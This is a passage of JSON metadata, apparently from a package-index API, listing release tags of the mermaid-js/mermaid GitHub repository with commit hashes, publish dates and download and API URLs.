b_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6/manifests"},{"name":"untagged-f43366252632a1a42020","sha":"e0d16dcb22333f967e172e1f5b78af4baf6c0eff","kind":"commit","published_at":"2020-01-11T09:07:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f43366252632a1a42020","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f43366252632a1a42020","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f43366252632a1a42020","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020/manifests"},{"name":"8.4.4","sha":"0544dbe89196f2709ad714432ed4f6c9883fa023","kind":"commit","published_at":"2019-12-14T08:27:38.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4/manifests"},{"name":"8.4.3","sha":"cb07a729e5e11d58ee1bce43dc041b76a610bde2","kind":"commit","published_at":"2019-11-30T23:42:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3/manifests"},{"name":"8.4.2","sha":"1ecf0f4c234a773c735dc56804233a66377db3b3","kind":"commit","published_at":"2019-11-07T20:16:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2/manifests"},{"name":"8.4.1","sha":"a3017b8456cfafb446aedb9ad549328a69e24984","kind":"commit","published_at":"2019-11-06T18:52:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1/manifests"},{"name":"8.4.0","sha":"0157f665a305b0616e7932360a2f9fb2fa154668","kind":"commit","published_at":"2019-10-19T14:59:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0/manifests"},{"name":"8.3.0","sha":"0200fef389e3b0988557028d6edd03262ceeefba","kind":"commit","published_at":"2019-09-19T05:19:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0/manifests"},{"name":"8.2.6","sha":"2cb54293f80af8c07bee8b91cfb04388e786fb83","kind":"commit","published_at":"2019-09-01T09:18:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6/manifests"},{"name":"8.2.5","sha":"34d3b852271ea3b7ebf58553334ad3d5645c15f1","kind":"commit","published_at":"2019-08-26T18:23:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5/manifests"},{"name":"8.2.4","sha":"a3142aad69167bc6b690e5a77550a869c86d79cd","kind":"commit","published_at":"2019-08-20T18:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4/manifests"},{"name":"8.2.3","sha":"5b85fe9293493bc68d105cf78192ac475c9c6d0e","kind":"commit","published_at":"2019-07-25T19:00:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3/manifests"},{"name":"8.2.2","sha":"cf686c445c069bd3137560f2ab3a30bfb7bc9dc5","kind":"commit","published_at":"2019-07-22T12:23:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2/manifests"},{"name":"8.2.1","sha":"5dd392127f1121dea2a05fb0a535101c085496b2","kind":"commit","published_at":"2019-07-21T09:23:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1/manifests"},{"name":"8.2.0","sha":"92ac7d7c2477071a7279927b023872d866571e28","kind":"commit","published_at":"2019-07-17T16:14:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0/manifests"},{"name":"8.1.0","sha":"95967151ae61be7db104564dbf29db81a4415f11","kind":"commit","published_at":"2019-06-25T08:24:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0/manifests"},{"name":"7.0.5","sha":"f6b5c704e8939db0047e7a70ab3b6109af261fb0","kind":"commit","published_at":"2017-09-01T10:34:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5/manifests"},{"name":"7.0.3","sha":"1076d671374898a1e75b778911832da01f57b88f","kind":"commit","published_at":"2017-06-04T04:13:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3/manifests"},{"name":"7.0.2","sha":"5f5c8a2df00d93d2a9ed48fa868d1a4ded761457","kind":"commit","published_at":"2017-06-01T05:38:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2/manifests"},{"name":"7.0.0","sha":"fb70b9742a22f8673cdd3a8d74fcbbc6ea03b432","kind":"commit","published_at":"2017-01-29T11:14:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0/manifests"},{"name":"6.0.0","sha":"b8d3b01f64f30fa1dd46f7de160e8f80147010f3","kind":"commit","published_at":"2016-05-29T17:25:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/6.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0/manifests"},{"name":"0.5.8","sha":"6ee298dc7d5913ea065b92e736184edcc05b6c74","kind":"commit","published_at":"2016-01-27T14:02:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8/manifests"},{"name":"0.5.7","sha":"f005c72669c0e41bac6f42f81a6805a923dacbf0","kind":"commit","published_at":"2016-01-25T17:59:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7/manifests"},{"name":"0.5.6","sha":"425a83c0da996ba565c2b840993fbf61a725a84a","kind":"commit","published_at":"2015-11-22T17:55:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6/manifests"},{"name":"0.5.5","sha":"c9d29c16e20783700701a340540959ed5680236c","kind":"commit","published_at":"2015-10-21T19:14:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5/manifests"},{"name":"0.5.4","sha":"ecb12ae2a8bc7f8c7077737713cf94acffac5c41","kind":"commit","published_at":"2015-10-19T20:08:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4/manifests"},{"name":"0.5.3","sha":"16906ee242fcaf51d77f082fc3e7167241432ab0","kind":"commit","published_at":"2015-10-04T21:28:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3/manifests"},{"name":"0.5.2","sha":"a611ff3abd70103fc9ac44af63103e9f9d5991c9","kind":"commit","published_at":"2015-10-04T21:09:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2/manifests"},{"name":"0.5.1","sha":"0dc983d04ab9400e604a460eea3a409570961ab2","kind":"commit","published_at":"2015-06-21T15:26:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1/manifests"},{"name":"0.5.0","sha":"999430f9e0c18ca830f497817c8701cfbd2046f9","kind":"commit","published_at":"2015-06-07T15:05:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0/manifests"},{"name":"0.4.0","sha":"cc1a4be15a5ed3726a121a5fce75a561ddca5e1d","kind":"commit","published_at":"2015-03-01T15:48:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0/manifests"},{"name":"0.3.5","sha":"2512666f493e8455f6534f216d42f00a7c9e526f","kind":"commit","published_at":"2015-02-15T18:34:18.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5/manifests"},{"name":"0.3.4","sha":"074a819ca8d3d98cdef3144d091a63f919d3a55d","kind":"commit","published_at":"2015-02-15T17:11:46.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4/manifests"},{"name":"0.3.3","sha":"5452be9feda681abb48d6364fbca662c6af0215d","kind":"commit","published_at":"2015-01-25T15:41:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3/manifests"},{"name":"0.3.2","sha":"911cd09dd875deb50f65a98baf21f65ab2cbf82b","kind":"commit","published_at":"2015-01-11T14:02:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2/manifests"},{"name":"0.3.1","sha":"222a6e06827f194d9368d3a790dbe6cc53341788","kind":"commit","published_at":"2015-01-05T14:32:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1/manifests"},{"name":"0.3.0","sha":"c50178c640a4f6c99539bcc64cf029e94263fdb4","kind":"commit","published_at":"2014-12-22T12:52:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0/manifests"},{"name":"0.2.16","sha":"5712c6de7bdca29a2950df1e6e0342ca8f0323a4","kind":"commit","published_at":"2014-12-15T18:35:09.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.16","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16/manifests"},{"name":"0.2.15","sha":"6988dea3535919faa599537c31c5d94a01a30479","kind":"commit","published_at":"2014-12-05T09:50:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.15","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15/manifests"},{"name":"0.2.14","sha":"dd26960852b4cba1d60e6bb2e508c0af6dd3d4b4","kind":"commit","published_at":"2014-12-03T18:35:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.14","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14/manifests"},{"name":"0.2.13","sha":"fe2f3b403d1310c2a6e09aac24d0fdd257c2ddcf","kind":"commit","published_at":"2014-12-03T18:29:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.13","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13/manifests"},{"name":"0.2.10","sha":"15023461722117d1429bbc0eb6030ca35aa51d53","kind":"commit","published_at":"2014-12-01T20:12:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10/manifests"},{"name":"0.2.9","sha":"1a7997cdef01882ea7b46948d58625e904a09094","kind":"tag","published_at":"2014-12-01T20:04:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9/manifests"},{"name":"0.2.8","sha":"1d2327c4c2ae60692f9bfe8b4d19ea195ebcbb04","kind":"tag","published_at":"2014-12-01T09:01:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8/manifests"},{"name":"0.2.7","sha":"cbd41dbb1b4875aa3254babca694844908a1ecf7","kind":"tag","published_at":"2014-12-01T08:30:27.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7/manifests"},{"name":"0.2.6","sha":"9a35844731426e1f74f64d272ae6398f20424457","kind":"commit","published_at":"2014-11-27T20:28:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6/manifests"},{"name":"0.2.5","sha":"18be0e02aa80dcad171b26d2e397750100d